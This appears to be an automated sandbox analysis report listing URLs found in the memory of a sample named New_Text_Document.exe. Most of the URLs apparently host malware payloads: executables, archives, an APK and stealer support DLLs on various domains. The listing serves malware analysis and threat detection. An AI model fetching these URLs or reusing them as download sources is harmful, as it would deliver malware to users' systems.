                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E6.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E8.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E9.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exilum.com/homegrownorlando.com/closed-section/additional-area/740331365-R4cXbyqTk/
                    Source: svchost.exe, 00000004.00000003.1241581435.000002548A000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://famesa.com.ar/dos/gaa/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://files5.uludagbilisim.com/OrtakModul/NBYS%20ASM.NET.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://files5.uludagbilisim.com/nbys.aspx?f=aile_hekimligi/NBYS%20AH.NET.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fountainofvictory.org/sp/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://freitasautocenter.com.br/als/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/arinzezx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/chungzx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/damianozx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/davincizx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/millianozx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fresh1.ironoreprod.top/_errorpages/undergroundzx.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fromthetrenchesworldreport.com/analytics/ZY5ntk/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://funletters.net/flowers/flowers1/smell-the-roses.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://funletters.net/scenic/scenic1/sunset1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fynefield.com/vee/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://galandskiyher1.com/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://genena.me/tiud/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://genericphar.com/spu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com/macigaiga/cstest/raw/master/cs_maltest.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gloombotmedia.com/dicm/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gobelmarine.com/itet/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gobesitysurgery.com/svcrun.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gokcevizyon.com/sBaEb/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://greenisco.com/scripts/lrXyEqX/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h171145.srv22.test-hf.su
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h171145.srv22.test-hf.su/201.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h171145.srv22.test-hf.su/timeSync.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://habbotips.free.fr/PluginFlash.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hacker.548848.xyz/wechatservice.apk
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://helmprecision.com/Helm/main/css/F1RnG5nDhK/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://helmprecision.com/Helm/main/css/pQGi4xm0aNV/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hemseducation.com/tssm/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://herchinfitout.com.sg/backup/sites/TsN0W4LrUYE7p/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hitstation.nl/css/parts_service/ly944myw/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hopvibestravel.co.za/BelgiumchainAGRO.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hr2019.vrcom7.com/cgi-bin/Document/81828115/BKxJH/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hrfrance.net/lfjsdk3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hrfrance.net/s2lub.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://htownbars.com/couch_db/d1CecdE_Tsz685UA4BMrUT_resource/additional_923726953_g44F7DIoe/7c10odn
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imbueautoworx.co.za/jpfnnl2g.zip
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000014.00000002.2504473111.0000000007870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://incotel.com.pk/10/data64_1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://incotel.com.pk/10/data64_2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://incotel.com.pk/10/data64_4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://incotel.com.pk/10/data64_5.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://initiative-td.org/eert/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ircftp.net/image.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ircftp.net/module/Veeam.Backup.Service.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iso-supporter.com/oe/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jcedu.org/ebook/cs17.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jensin.com.vn/docss/portfolio.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.alie3ksgbb.com/m/esgla2i5.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.alie3ksgbb.com/m/ss29
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.fhauiehgha.com/m/etty27.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.fhauiehgha.com/m/ss47.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ji.jaoaaoas11.com/m/ss33.exe
